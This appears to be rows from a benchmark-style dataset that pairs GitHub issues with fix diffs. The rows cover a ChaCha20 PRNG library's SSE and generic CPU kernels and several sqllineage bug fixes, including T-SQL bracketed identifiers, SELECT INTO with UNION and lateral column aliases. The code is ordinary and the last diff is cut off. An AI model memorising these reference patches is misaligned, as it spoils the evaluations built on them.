-VectorizedState vectorize_state(const uint32_t state[16]);
+ void unvectorize(uint32_t out_state[ChaChaStateSizeInWords]) const;
-void unvectorize_state(uint32_t out_state[16], VectorizedState vec_state);
+ StateRow& operator[](uint i);
-void chacha20_block_sse(uint32_t out_state[16], const uint32_t in_state[16]);
+ VectorizedState& operator+=(VectorizedState other);
+ VectorizedState operator+(VectorizedState other) const;
+};
+void unpack_diagonals(VectorizedState& out_state, VectorizedState in_state);
+void pack_diagonals(VectorizedState& out_state, VectorizedState in_state);
+void chacha20_block(uint32_t out_state[16], const uint32_t in_state[16]);
void cpu_chacha20_block(void* out_buffer, const void** in_buffers);
diff --git a/lib/defs.hpp b/lib/defs.hpp
index c165a3f..8e49838 100644
--- a/lib/defs.hpp
+++ b/lib/defs.hpp
@@ -8,6 +8,8 @@ typedef unsigned int uint;
constexpr uint ChaChaDoubleRoundCount = 10;
constexpr uint ChaChaStateSizeInWords = 16;
constexpr uint ChaChaStateSizeInBytes = 4 * ChaChaStateSizeInWords;
+constexpr uint ChaChaStateWordsPerRow = 4;
+constexpr uint ChaChaStateSizeInRows = ChaChaStateSizeInWords / ChaChaStateWordsPerRow;
#ifdef CUDA_ENABLED
// Constants for Cuda kernels
diff --git a/lib/generic/cpu_kernel_arch.hpp b/lib/generic/cpu_kernel_arch.hpp
new file mode 100644
index 0000000..51a63b0
--- /dev/null
+++ b/lib/generic/cpu_kernel_arch.hpp
@@ -0,0 +1,70 @@
+// SPDX-License-Identifier: Apache-2.0
+// SPDX-FileCopyrightText: © 2022 Aalto University
+
+#pragma once
+
+#include "../defs.hpp"
+#include <stdint.h>
+#include <algorithm>
+
+struct StateRow
+{
+ uint32_t values[ChaChaStateWordsPerRow];
+
+ StateRow() : values() { }
+ StateRow(const uint32_t row_values[ChaChaStateWordsPerRow]) : StateRow()
+ {
+ std::copy_n(row_values, ChaChaStateWordsPerRow, values);
+ }
+
+ inline StateRow& operator+=(const StateRow other)
+ {
+ for (uint i = 0; i < ChaChaStateWordsPerRow; ++i)
+ {
+ values[i] += other.values[i];
+ }
+ return *this;
+ }
+
+ inline StateRow& operator^=(const StateRow other)
+ {
+ for (uint i = 0; i < ChaChaStateWordsPerRow; ++i)
+ {
+ values[i] ^= other.values[i];
+ }
+ return *this;
+ }
+
+ inline StateRow& operator<<=(int num_bits)
+ {
+ for (uint i = 0; i < ChaChaStateWordsPerRow; ++i)
+ {
+ uint32_t val = values[i];
+ values[i] = (val << num_bits) | (val >> (32 - num_bits));
+ }
+ return *this;
+ }
+
+ template <int num_positions>
+ inline StateRow rotate_elements_left() const
+ {
+ StateRow res;
+ for (uint i = 0; i < ChaChaStateWordsPerRow; ++i)
+ {
+ res.values[i] = values[(num_positions + i) % ChaChaStateWordsPerRow];
+ }
+ return res;
+ }
+
+ template <uint num_positions>
+ inline StateRow rotate_elements_right() const
+ {
+ return rotate_elements_left<(ChaChaStateWordsPerRow - num_positions) % ChaChaStateWordsPerRow>();
+ }
+
+ inline void unvectorize(uint32_t out_buffer[ChaChaStateWordsPerRow]) const
+ {
+ std::copy_n(values, ChaChaStateWordsPerRow, out_buffer);
+ }
+
+};
diff --git a/lib/intel/cpu_kernel_arch.hpp b/lib/intel/cpu_kernel_arch.hpp
new file mode 100644
index 0000000..7bc31bb
--- /dev/null
+++ b/lib/intel/cpu_kernel_arch.hpp
@@ -0,0 +1,92 @@
+// SPDX-License-Identifier: Apache-2.0
+// SPDX-FileCopyrightText: © 2022 Aalto University
+
+#pragma once
+
+#include "../defs.hpp"
+#include <stdint.h>
+#include <immintrin.h>
+#include <utility>
+
+
+// Wrap _mm_shuffle_epi32 in a template to enforce that rotation_immediate
+// is always known at compile time.
+template <uint8_t rotation_immediate>
+inline __m128i _mm_shuffle_epi32_templated(__m128i val)
+{
+ return _mm_shuffle_epi32(val, rotation_immediate);
+}
+
+// Rotate elements in a 4-vec
+template <uint num_positions>
+inline __m128i rotate_m128i_left(__m128i vec)
+{
+ constexpr uint8_t rotation_lookup[ChaChaStateWordsPerRow] = {
+ 0b11100100,
+ 0b00111001,
+ 0b01001110,
+ 0b10010011
+ };
+ constexpr uint8_t rotation_immediate = rotation_lookup[num_positions];
+ // using the templated wrapper for _mm_shuffle_epi32, otherwise
+ // gcc may be confused and decide to not treat rotation_immediate as
+ // compile-time known in debug mode (-O0) for some reason, resulting
+ // in errors from _mm_shuffle_epi32:
+ return _mm_shuffle_epi32_templated<rotation_immediate>(vec);
+}
+
+template <>
+inline __m128i rotate_m128i_left<0>(__m128i vec)
+{
+ return vec;
+}
+
+struct StateRow
+{
+private:
+ __m128i values;
+
+public:
+ StateRow() {}
+ StateRow(const uint32_t row_values[ChaChaStateWordsPerRow])
+ : values(_mm_load_si128(reinterpret_cast<const __m128i*>(row_values))) { }
+ StateRow(__m128i vals) : values(std::move(vals)) { }
+
+ inline StateRow& operator+=(const StateRow other)
+ {
+ values = _mm_add_epi32(values, other.values);
+ return *this;
+ }
+
+ inline StateRow& operator^=(const StateRow other)
+ {
+ values = _mm_xor_si128(values, other.values);
+ return *this;
+ }
+
+ inline StateRow& operator<<=(int num_bits)
+ {
+ values = _mm_xor_si128(
+ _mm_slli_epi32(values, num_bits),
+ _mm_srli_epi32(values, 32 - num_bits)
+ ); // (value << num_bits) ^ (value >> (32 - num_bits));
+ return *this;
+ }
+
+ template <uint num_positions>
+ inline StateRow rotate_elements_left() const
+ {
+ return StateRow(rotate_m128i_left<num_positions>(values));
+ }
+
+ template <uint num_positions>
+ inline StateRow rotate_elements_right() const
+ {
+ return rotate_elements_left<(ChaChaStateWordsPerRow - num_positions) % ChaChaStateWordsPerRow>();
+ }
+
+ inline void unvectorize(uint32_t out_buffer[ChaChaStateWordsPerRow]) const
+ {
+ _mm_store_si128(reinterpret_cast<__m128i*>(out_buffer), values);
+ }
+};
diff --git a/lib/python_bindings.cpp b/lib/python_bindings.cpp
index 688ee94..451901d 100644
--- a/lib/python_bindings.cpp
+++ b/lib/python_bindings.cpp
@@ -1,5 +1,5 @@
// SPDX-License-Identifier: Apache-2.0
-// SPDX-FileCopyrightText: © 2021 Aalto University
+// SPDX-FileCopyrightText: © 2022 Aalto University
#include <pybind11/pybind11.h>
@@ -14,6 +14,15 @@ constexpr bool cuda_supported()
#endif
}
+constexpr bool openmp_accelerated()
+{
+#ifdef OPENMP_AVAILABLE
+ return true;
+#else
+ return false;
+#endif
+}
+
PYBIND11_MODULE(native, m)
{
m.def("cpu_chacha20_block_factory",
@@ -25,4 +34,5 @@ PYBIND11_MODULE(native, m)
#endif // CUDA_ENABLED
m.def("cuda_supported", &cuda_supported, "Returns true if CUDA kernels were compiled.");
+ m.def("openmp_accelerated", &openmp_accelerated, "Returns true if CPU kernels are accelerated using OpenMP.");
}
diff --git a/setup.py b/setup.py
index af65e67..98c6646 100644
--- a/setup.py
+++ b/setup.py
@@ -1,5 +1,5 @@
# SPDX-License-Identifier: Apache-2.0
-# SPDX-FileCopyrightText: © 2021 Aalto University
+# SPDX-FileCopyrightText: © 2022 Aalto University
import setuptools
from setuptools import Extension
@@ -70,7 +70,7 @@ def build_extension(self, ext):
_jax_version_lower_constraint = ' >= 0.2.12'
_jax_version_optimistic_upper_constraint = ', <= 2.0.0'
-_jax_version_upper_constraint = ', <= 0.3.15'
+_jax_version_upper_constraint = ', <= 0.3.17'
_version = version_module.VERSION
if 'JAX_CHACHA_PRNG_BUILD' in os.environ:
| Support for ARM based systems
Due to its reliance on Intel SIMD intrinsics, the package can currently not be used on any ARM based systems like Apple's M1.
Support for such systems is desired. Therefore the CPU kernels need to be implemented also using ARM NEON intrinsics.
| 2022-09-06T10:31:59 | 0.0 | [] | [] |
|||
reata/sqllineage | reata__sqllineage-619 | 33b36ee82f39827ea7bd611d14104def888a768c | diff --git a/sqllineage/utils/helpers.py b/sqllineage/utils/helpers.py
index e403ba79..df9c3ede 100644
--- a/sqllineage/utils/helpers.py
+++ b/sqllineage/utils/helpers.py
@@ -17,6 +17,10 @@ def escape_identifier_name(name: str):
for quote_char in quote_chars:
name = name.strip(quote_char)
return name
+ elif name.startswith("[") and name.endswith("]"):
+ # tsql allows quoted identifier with square brackets, see reference
+ # https://learn.microsoft.com/en-us/sql/relational-databases/databases/database-identifiers?view=sql-server-ver16#classes-of-identifiers
+ return name.strip("[]")
else:
return name.lower()
| Tsql table names with square brackets are not resolved correctly
Tsql:
When the same table name or column name has square brackets, the parsing result is considered to be two different objects, but it should actually be the same object.
Is there any configuration where I find that mysql backquotes can be parsed correctly
当相同的表名或列名有方括号时,解析结果认为是两个不同的对象,实际应该为同一个对象。
是有什么配置吗,我发现mysql的反引号是可以正确解析的
**SQL**
```sql
insert into [t1] select id from user_tab;
insert into t2 select id from t1
```
**shell**
```shell
sqllineage -e "insert into [t1] select id from user_tab;insert into t2 select id from t1" -d tsql
```
Current parsing
```
Statements(#): 2
Source Tables:
<default>.t1
<default>.user_tab
Target Tables:
<default>.[t1]
<default>.t2
```
Correct parsing
```
Statements(#): 2
Source Tables:
<default>.user_tab
Target Tables:
<default>.t2
Intermediate Tables:
<default>.t1
```
**Python version (available via `python --version`)**
- 3.12.1
**SQLLineage version (available via `sqllineage --version`):**
- 1.5.1
| Thanks for reporting the issue.
Square brackets used around table name is special in tsql to escape identifier names. We should support that.
Ref: https://learn.microsoft.com/en-us/sql/relational-databases/databases/database-identifiers?view=sql-server-ver15#classes-of-identifiers
Should be an easy fix by updating [escape_identifier_name](https://github.com/reata/sqllineage/blob/v1.5.1/sqllineage/utils/helpers.py#L8) function.
Thanks you,please fix. | 2024-05-24T14:43:34 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-593 | 55bbdb8da2fe0d46412dbcbfcf3d8787980027c0 | diff --git a/setup.py b/setup.py
index 12bc4acd..ba421ddb 100644
--- a/setup.py
+++ b/setup.py
@@ -68,7 +68,7 @@ def run(self) -> None:
install_requires=[
"sqlparse==0.4.4",
"networkx>=2.4",
- "sqlfluff==2.3.5",
+ "sqlfluff==3.0.3",
"sqlalchemy>=2.0.0",
],
entry_points={"console_scripts": ["sqllineage = sqllineage.cli:main"]},
diff --git a/sqllineage/core/parser/sqlfluff/utils.py b/sqllineage/core/parser/sqlfluff/utils.py
index 09a7559e..bdeaa06c 100644
--- a/sqllineage/core/parser/sqlfluff/utils.py
+++ b/sqllineage/core/parser/sqlfluff/utils.py
@@ -59,20 +59,12 @@ def find_from_expression_element(segment: BaseSegment) -> Optional[BaseSegment]:
from_clause as grandparent
from_expression/join_clause as parent
"""
- from_expression_element = None
- if segment.type in ["from_clause", "update_statement"]:
- if from_expression := segment.get_child("from_expression"):
- non_bracket = from_expression
- while bracketed := non_bracket.get_child("bracketed"):
- non_bracket = bracketed
- if seg := non_bracket.get_child("from_expression_element"):
- from_expression_element = seg
- elif seg := non_bracket.get_child("from_expression"):
- if sub_seg := seg.get_child("from_expression_element"):
- from_expression_element = sub_seg
- elif segment.type in ("from_expression", "join_clause"):
- if seg := segment.get_child("from_expression_element"):
- from_expression_element = seg
+ try:
+ from_expression_element = next(
+ segment.recursive_crawl("from_expression_element")
+ )
+ except StopIteration:
+ from_expression_element = None
return from_expression_element
@@ -94,14 +86,8 @@ def list_join_clause(segment: BaseSegment) -> List[BaseSegment]:
"""
traverse from_clause, recursively goes into bracket by default
"""
- if from_expression := segment.get_child("from_expression"):
- if bracketed := from_expression.get_child("bracketed"):
- join_clauses = bracketed.get_children("join_clause")
- if inner_bracket := bracketed.get_child("bracketed"):
- join_clauses = list_join_clause(inner_bracket) + join_clauses
- return join_clauses
- else:
- return from_expression.get_children("join_clause")
+ if segment.type in ["from_clause", "update_statement"]:
+ return list(segment.recursive_crawl("join_clause"))
return []
| Clickhouse SQL 'GLOBAL IN' not support
Clickhouse SQL 'GLOBAL IN' not support
sqllineage -f ./sql-global-ck.sql --dialect=clickhouse
```sql
SELECT id, name FROM distributed_table WHERE id GLOBAL IN (SELECT id FROM local_table);
```
Line 1, Position 49: Found unparsable section: 'GLOBAL IN (SELECT id FROM local_table)'
Python 3.8
Sqllineage 1.5.0
| This is not supported by the underlying sqlfluff, not by sqllineage.
Upstream issue https://github.com/sqlfluff/sqlfluff/issues/5256 as reference.
Once they fix the issue and release a new version, we can upgrade the dependency and get this done.
Upstream issue is fixed in sqlfluff==3.0.0a5. Since 3.0.0a5 is an alpha release, we will not upgrade sqllineage dependency and will wait for 3.0.0 instead. But you can manually upgrade your sqlfluff to get unblocked. | 2024-04-07T09:24:14 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-572 | e0fbf32abaf1eb51db27c2b0995a7b3e9cdc3ed0 | diff --git a/sqllineage/core/parser/sqlfluff/extractors/select.py b/sqllineage/core/parser/sqlfluff/extractors/select.py
index f19a3b07..beee03f8 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/select.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/select.py
@@ -59,12 +59,7 @@ def extract(
self.extract_subquery(subqueries, holder)
for segment in segments:
- self._handle_swap_partition(segment, holder)
- self._handle_select_into(segment, holder)
- self.tables.extend(
- self._list_table_from_from_clause_or_join_clause(segment, holder)
- )
- self._handle_column(segment)
+ self._handle_select_statement_child_segments(segment, holder)
if is_set_expression(segment):
for idx, sub_segment in enumerate(
@@ -75,12 +70,7 @@ def extract(
(len(self.columns), len(self.tables))
)
for seg in list_child_segments(sub_segment):
- self.tables.extend(
- self._list_table_from_from_clause_or_join_clause(
- seg, holder
- )
- )
- self._handle_column(seg)
+ self._handle_select_statement_child_segments(seg, holder)
self.end_of_query_cleanup(holder)
@@ -88,6 +78,16 @@ def extract(
return holder
+ def _handle_select_statement_child_segments(
+ self, segment: BaseSegment, holder: SubQueryLineageHolder
+ ):
+ self._handle_swap_partition(segment, holder)
+ self._handle_select_into(segment, holder)
+ self.tables.extend(
+ self._list_table_from_from_clause_or_join_clause(segment, holder)
+ )
+ self._handle_column(segment)
+
@staticmethod
def _handle_swap_partition(segment: BaseSegment, holder: SubQueryLineageHolder):
"""
| Missing target table with tsql parsing into statements with union
**Describe the bug**
* There is an issue with tsql parsing into statements with union, unable to obtain target
**SQL**
```sql
select * into t3 from t1 union all select * from t2
```
- `if` CLI (Command Line Interface): provide the command you're calling and the output.
For example:
```shell
sqllineage -e 'select * into t3 from t1 union all select * from t2' -d tsql
```
```
Statements(#): 1
Source Tables:
<default>.t2
<default>.t3
Target Tables:
```
**Python version (available via `python --version`)**
- 3.12.1
**SQLLineage version (available via `sqllineage --version`):**
- 1.5.0
| The expected output should be:
```
Source Tables:
<default>.t1
<default>.t2
Target Tables:
<default>.t3
```
Is that correct?
Yes, this is correct
Thanks for your confirmation. Looks like we have some issue in handling SELECT INTO + UNION case.
麻烦帮忙修复嘛,这对我真的很重要 0.0。
可以在这里请教一个问题嘛,对于SQL server存储过程的解析,我使用时,不能直接解析,需要去掉create ... begin ... 之后,只保留sql,才可以。怎样可以直接解析,或者忽略掉 create ..... begin ... 语句,silent_mode = True,添加了,也无法解析.....
You need to do preprocessing yourself, because [sqlfluff](https://github.com/sqlfluff/sqlfluff) does not support stored procedures, not sqllineage.
ok | 2024-01-31T15:36:51 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-557 | 942fcf4e5578da3f3ce22501b17fbceb5ea9c350 | diff --git a/sqllineage/core/parser/sqlfluff/extractors/create_insert.py b/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
index 7610bac2..1873ab7e 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
@@ -1,7 +1,7 @@
from sqlfluff.core.parser import BaseSegment
from sqllineage.core.holders import SubQueryLineageHolder
-from sqllineage.core.models import Path
+from sqllineage.core.models import Path, Table
from sqllineage.core.parser.sqlfluff.extractors.base import BaseExtractor
from sqllineage.core.parser.sqlfluff.extractors.select import SelectExtractor
from sqllineage.core.parser.sqlfluff.models import SqlFluffColumn, SqlFluffTable
@@ -104,6 +104,15 @@ def extract(
if segment.type in ["table_reference", "object_reference"]:
write_obj = SqlFluffTable.of(segment)
holder.add_write(write_obj)
+ # get target table columns from metadata if available
+ if (
+ isinstance(write_obj, Table)
+ and self.metadata_provider
+ and statement.type == "insert_statement"
+ ):
+ holder.add_write_column(
+ *self.metadata_provider.get_table_columns(table=write_obj)
+ )
elif segment.type == "literal":
if segment.raw.isnumeric():
# Special Handling for Spark Bucket Table DDL
| set target table column name from MetaDataProvider
**Is your feature request related to a problem? Please describe.**
sql: "insert into target select user_id, user_name from source"
target's column is id, name
column lineage 's target column is user_id, user_name from sql parse
**Describe the solution you'd like**
use MetaDataProvider, search target table's column ,write to Holder.
equal "insert into target(id, name) select user_id, user_name from source"
| This is a valid case that we definitely want to improve with MetaDataProvider.
I'll come back review the PR after I get MetaDataProvider formally documented and released with v1.5.0. | 2024-01-17T04:54:29 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-552 | 0823bf2e32f19d0f64a2c7acb951213db8696b93 | diff --git a/sqllineage/config.py b/sqllineage/config.py
index e1be037d..4cc7dc1b 100644
--- a/sqllineage/config.py
+++ b/sqllineage/config.py
@@ -15,14 +15,36 @@ class _SQLLineageConfigLoader:
# to enable tsql no semicolon splitter mode
"TSQL_NO_SEMICOLON": (bool, False),
}
+ BOOLEAN_TRUE_STRINGS = ("true", "on", "ok", "y", "yes", "1")
def __getattr__(self, item):
if item in self.config:
type_, default = self.config[item]
# require SQLLINEAGE_ prefix from environment variable
- return type_(os.environ.get("SQLLINEAGE_" + item, default))
+ return self.parse_value(
+ os.environ.get("SQLLINEAGE_" + item, default), type_
+ )
else:
return super().__getattribute__(item)
+ @classmethod
+ def parse_value(cls, value, cast):
+ """Parse and cast provided value
+
+ :param value: Stringed value.
+ :param cast: Type to cast return value as.
+
+ :returns: Casted value
+ """
+ if cast is bool:
+ try:
+ value = int(value) != 0
+ except ValueError:
+ value = value.lower().strip() in cls.BOOLEAN_TRUE_STRINGS
+ else:
+ value = cast(value)
+
+ return value
+
SQLLineageConfig = _SQLLineageConfigLoader()
| SQLLineageConfig boolean value returns True for all non-empty strings
**SQLLineageConfig** returns True for all non-empty strings
**Expected**
```
'true', 'on', 'ok', 'y', 'yes', '1'
```
For the strings in the above list, return True, otherwise return False
| 2024-01-14T12:24:49 | 0.0 | [] | [] |
|||
reata/sqllineage | reata__sqllineage-521 | 0e825c25972c4d2bae0b9910aae90e4d4ebac213 | diff --git a/sqllineage/core/holders.py b/sqllineage/core/holders.py
index f96e7f3d..c62a553f 100644
--- a/sqllineage/core/holders.py
+++ b/sqllineage/core/holders.py
@@ -144,7 +144,7 @@ def expand_wildcard(self, metadata_provider: MetaDataProvider) -> None:
for column in self.write_columns:
if column.raw_name == "*":
tgt_wildcard = column
- for src_wildcard in self._get_source_columns(tgt_wildcard):
+ for src_wildcard in self.get_source_columns(tgt_wildcard):
if source_table := src_wildcard.parent:
src_table_columns = []
if isinstance(source_table, SubQuery):
@@ -169,7 +169,7 @@ def _get_target_table(self) -> Optional[Union[SubQuery, Table]]:
table = next(iter(write_only))
return table
- def _get_source_columns(self, node: Column) -> List[Column]:
+ def get_source_columns(self, node: Column) -> List[Column]:
return [
src
for (src, tgt, edge_type) in self.graph.in_edges(nbunch=node, data="type")
diff --git a/sqllineage/core/models.py b/sqllineage/core/models.py
index 610571bd..85457d45 100644
--- a/sqllineage/core/models.py
+++ b/sqllineage/core/models.py
@@ -147,7 +147,7 @@ def __init__(self, name: str, **kwargs):
"""
self._parent: Set[Union[Path, Table, SubQuery]] = set()
self.raw_name = escape_identifier_name(name)
- self.source_columns = (
+ self.source_columns = [
(
escape_identifier_name(raw_name),
escape_identifier_name(qualifier) if qualifier is not None else None,
@@ -155,7 +155,7 @@ def __init__(self, name: str, **kwargs):
for raw_name, qualifier in kwargs.pop(
"source_columns", ((self.raw_name, None),)
)
- )
+ ]
def __str__(self):
return (
diff --git a/sqllineage/core/parser/__init__.py b/sqllineage/core/parser/__init__.py
index 73d24af2..f9c7ea1b 100644
--- a/sqllineage/core/parser/__init__.py
+++ b/sqllineage/core/parser/__init__.py
@@ -25,8 +25,16 @@ def end_of_query_cleanup(self, holder: SubQueryLineageHolder) -> None:
if len(holder.write) > 1:
raise SQLLineageException
tgt_tbl = list(holder.write)[0]
+ lateral_aliases = set()
for idx, tgt_col in enumerate(col_grp):
tgt_col.parent = tgt_tbl
+ for lateral_alias_ref in col_grp[idx + 1 :]: # noqa: E203
+ if any(
+ src_col[0] == tgt_col.raw_name
+ for src_col in lateral_alias_ref.source_columns
+ ):
+ lateral_aliases.add(tgt_col.raw_name)
+ break
for src_col in tgt_col.to_source_columns(
self.get_alias_mapping_from_table_group(tbl_grp, holder)
):
@@ -37,6 +45,22 @@ def end_of_query_cleanup(self, holder: SubQueryLineageHolder) -> None:
# for invalid query: create view test (col3, col4) select col1 as col2 from tab,
# when the length doesn't match, we fall back to default behavior
tgt_col = write_columns[idx]
+ is_lateral_alias_ref = False
+ for wc in holder.write_columns:
+ if wc.raw_name == "*":
+ continue
+ if (
+ src_col.raw_name == wc.raw_name
+ and src_col.raw_name in lateral_aliases
+ ):
+ is_lateral_alias_ref = True
+ for lateral_alias_col in holder.get_source_columns(wc):
+ holder.add_column_lineage(
+ lateral_alias_col, tgt_col
+ )
+ break
+ if is_lateral_alias_ref:
+ continue
holder.add_column_lineage(src_col, tgt_col)
@classmethod
| Support Lateral Column Alias Reference Analyzing
**SQL**
```sql
insert into public.tgt_tbl1
(
id
)
select
sq.id
from
(
select
name as user_name,
user_name as id -- backward reference
from
public.src_tbl1
) sq
;
```
**To Reproduce**
*Note here we refer to SQL provided in prior step as stored in a file named `test.sql`*
```python
from sqllineage.runner import LineageRunner
with open("test.sql") as f:
sql = f.read()
lr = LineageRunner(sql, dialect='redshift')
lr.print_column_lineage()
```
```
public.tgt_tbl1.id <- sq.id <- public.src_tbl1.user_name
```
**Expected behavior**
```
public.tgt_tbl1.id <- sq.id <- public.src_tbl1.name
```
**Python version (available via `python --version`)**
- 3.11.5
**SQLLineage version (available via `sqllineage --version`):**
- 1.4.9
| This feature is officially called `lateral column alias reference`, see https://aws.amazon.com/about-aws/whats-new/2018/08/amazon-redshift-announces-support-for-lateral-column-alias-reference/
It's not universally supported by every SQL dialects. We will consider adding support but it won't be in high priority.
Tried a few open source SQL database/data warehouse, only sparksql support this feature at the end of 2023.
|dialect|version|support lateral column alias reference|
|---|---|---|
|mysql|8.2.0|no|
|postgres|16.1|no|
|hive|3.1.3|no|
|sparksql|3.5.0|yes|
|trino|435|no|
SparkSQL support was added since [3.4.0](https://spark.apache.org/releases/spark-release-3-4-0.html) via [SPARK-27561](https://issues.apache.org/jira/browse/SPARK-27561), released April 13, 2023. | 2024-01-01T02:57:59 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-514 | 4ac7fde375f597c541c33d549cf1be4140cdaa2e | diff --git a/sqllineage/core/models.py b/sqllineage/core/models.py
index 9101e837..54ae55fe 100644
--- a/sqllineage/core/models.py
+++ b/sqllineage/core/models.py
@@ -147,7 +147,15 @@ def __init__(self, name: str, **kwargs):
"""
self._parent: Set[Union[Path, Table, SubQuery]] = set()
self.raw_name = escape_identifier_name(name)
- self.source_columns = kwargs.pop("source_columns", ((self.raw_name, None),))
+ self.source_columns = (
+ (
+ escape_identifier_name(raw_name),
+ escape_identifier_name(qualifier) if qualifier is not None else None,
+ )
+ for raw_name, qualifier in kwargs.pop(
+ "source_columns", ((self.raw_name, None),)
+ )
+ )
def __str__(self):
return (
diff --git a/sqllineage/core/parser/__init__.py b/sqllineage/core/parser/__init__.py
index 6f1dd25d..73d24af2 100644
--- a/sqllineage/core/parser/__init__.py
+++ b/sqllineage/core/parser/__init__.py
@@ -25,8 +25,7 @@ def end_of_query_cleanup(self, holder: SubQueryLineageHolder) -> None:
if len(holder.write) > 1:
raise SQLLineageException
tgt_tbl = list(holder.write)[0]
- for idx in range(len(col_grp)):
- tgt_col = col_grp[idx]
+ for idx, tgt_col in enumerate(col_grp):
tgt_col.parent = tgt_tbl
for src_col in tgt_col.to_source_columns(
self.get_alias_mapping_from_table_group(tbl_grp, holder)
| subquery mistake alias as table name in visualiztion
**Describe the bug**
Alias of a subquery show as a Table node in Visualizes Table/Column Lineage
**SQL**
```sql
CREATE TABLE main.tab1 AS (
SELECT * FROM (
SELECT T0.* FROM (SELECT * FROM main.tab0) T0 WHERE T0.num < 100
)
)
```
**To Reproduce**
*Note here we refer to SQL provided in prior step as stored in a file named `test.sql`*
sqllineage -f test.sql --dialect=ansi -g
Web UI (Web User Interface):
<img width="385" alt="alias_table" src="https://github.com/reata/sqllineage/assets/17078500/7110a38e-f4a4-4b85-9074-6b18444c8181">
**Expected behavior**
There should be no table node for alias of subquery.
**Python version (available via `python --version`)**
- 3.10.13
**SQLLineage version (available via `sqllineage --version`):**
- 1.4.9
| Bug confirmed. Thanks for reporting.
The column lineage is also incorrect in this case. | 2023-12-26T07:59:00 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-510 | c0cf6aa6fc5976a61ed534040b44b21cafb41094 | diff --git a/sqllineage/core/parser/sqlfluff/models.py b/sqllineage/core/parser/sqlfluff/models.py
index 6c603092..921600ea 100644
--- a/sqllineage/core/parser/sqlfluff/models.py
+++ b/sqllineage/core/parser/sqlfluff/models.py
@@ -209,13 +209,9 @@ def _get_column_from_subquery(
def _get_column_from_parenthesis(
sub_segment: BaseSegment,
) -> List[ColumnQualifierTuple]:
- """
- :param sub_segment: segment to be processed
- :return: list of columns and alias from the segment
- """
- col, _ = SqlFluffColumn._get_column_and_alias(sub_segment)
- if col:
- return col
+ # windows function has an extra layer, get rid of it so that it can be handled as regular functions
+ if window_specification := sub_segment.get_child("window_specification"):
+ sub_segment = window_specification
col, _ = SqlFluffColumn._get_column_and_alias(sub_segment, False)
return col if col else []
@@ -223,6 +219,10 @@ def _get_column_from_parenthesis(
def _get_column_and_alias(
segment: BaseSegment, check_bracketed: bool = True
) -> Tuple[List[ColumnQualifierTuple], Optional[str]]:
+ """
+ check_bracketed is True for top-level column definition, like (col1 + col2) as col3
+ set to False for bracket in function call, like coalesce(col1, col2) as col3
+ """
alias = None
columns = []
sub_segments = list_child_segments(segment, check_bracketed)
diff --git a/sqllineage/core/parser/sqlfluff/utils.py b/sqllineage/core/parser/sqlfluff/utils.py
index 406b17de..c9b732cd 100644
--- a/sqllineage/core/parser/sqlfluff/utils.py
+++ b/sqllineage/core/parser/sqlfluff/utils.py
@@ -48,7 +48,7 @@ def is_subquery(segment: BaseSegment) -> bool:
def is_wildcard(segment: BaseSegment) -> bool:
return segment.type == "wildcard_expression" or (
- segment.type == "symbol" and segment.raw == "*"
+ segment.type == "symbol" and segment.raw == "*" and segment.get_type() == "star"
)
| Misidentify Binary Operator * As Wildcard
```sql
insert into
public.tgt_tbl1
(
id
)
select
nvl(src_tbl1.id, 0) * 1 as id
from
public.src_tbl1 as src_tbl1
;
```
**To Reproduce**
*Note here we refer to SQL provided in prior step as stored in a file named `test.sql`*
```python
with open(sql_file, 'r') as f:
sql = f.read()
lr = LineageRunner(sql, dialect='redshift')
lr.print_column_lineage()
```
```
public.tgt_tbl1.id <- public.src_tbl1.*
public.tgt_tbl1.id <- public.src_tbl1.id
```
**Expected behavior**
```
public.tgt_tbl1.id <- public.src_tbl1.id
```
**Python version (available via `python --version`)**
- 3.11.5
**SQLLineage version (available via `sqllineage --version`):**
- 1.4.8
**The lineage of the two variants of SQL is also incorrect.**
```sql
insert into
public.tgt_tbl1
(
id
)
select
coalesce(src_tbl1.id, 0) * 1 as id
from
public.src_tbl1 as src_tbl1
;
```
```sql
insert into
public.tgt_tbl1
(
id
)
select
case when src_tbl1.id is not null then src_tbl1.id else 0 end * 1 as id
from
public.src_tbl1 as src_tbl1
;
```
| Yes this is a bug when binary operator `*` is misidentified as wildcard. We should get it fixed. | 2023-12-24T09:17:38 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-509 | c0cf6aa6fc5976a61ed534040b44b21cafb41094 | diff --git a/sqllineage/cli.py b/sqllineage/cli.py
index e5ff05c0..15b27f2d 100644
--- a/sqllineage/cli.py
+++ b/sqllineage/cli.py
@@ -86,6 +86,11 @@ def main(args=None) -> None:
help="list all the available dialects",
action="store_true",
)
+ parser.add_argument(
+ "--silent_mode",
+ help="skip unsupported statements",
+ action="store_true",
+ )
args = parser.parse_args(args)
if args.e and args.f:
warnings.warn("Both -e and -f options are specified. -e option will be ignored")
@@ -100,6 +105,7 @@ def main(args=None) -> None:
"port": args.port,
"f": args.f if args.f else None,
},
+ silent_mode=args.silent_mode,
)
if args.graph_visualization:
runner.draw(args.dialect)
diff --git a/sqllineage/core/analyzer.py b/sqllineage/core/analyzer.py
index a30ea65e..8f41ffbc 100644
--- a/sqllineage/core/analyzer.py
+++ b/sqllineage/core/analyzer.py
@@ -13,8 +13,10 @@ class LineageAnalyzer:
SUPPORTED_DIALECTS: List[str] = []
@abstractmethod
- def analyze(self, sql: str) -> StatementLineageHolder:
+ def analyze(self, sql: str, silent_mode: bool) -> StatementLineageHolder:
"""
to analyze single statement sql and store the result into
- :class:`sqllineage.core.holders.StatementLineageHolder`.
+ :class:`sqllineage.core.holders.StatementLineageHolder`
+
+ :param silent_mode: skip unsupported statements.
"""
diff --git a/sqllineage/core/parser/sqlfluff/analyzer.py b/sqllineage/core/parser/sqlfluff/analyzer.py
index 15af2fc5..e716f3d4 100644
--- a/sqllineage/core/parser/sqlfluff/analyzer.py
+++ b/sqllineage/core/parser/sqlfluff/analyzer.py
@@ -35,7 +35,7 @@ def split_tsql(self, sql: str) -> List[str]:
sqls.append(segment.raw)
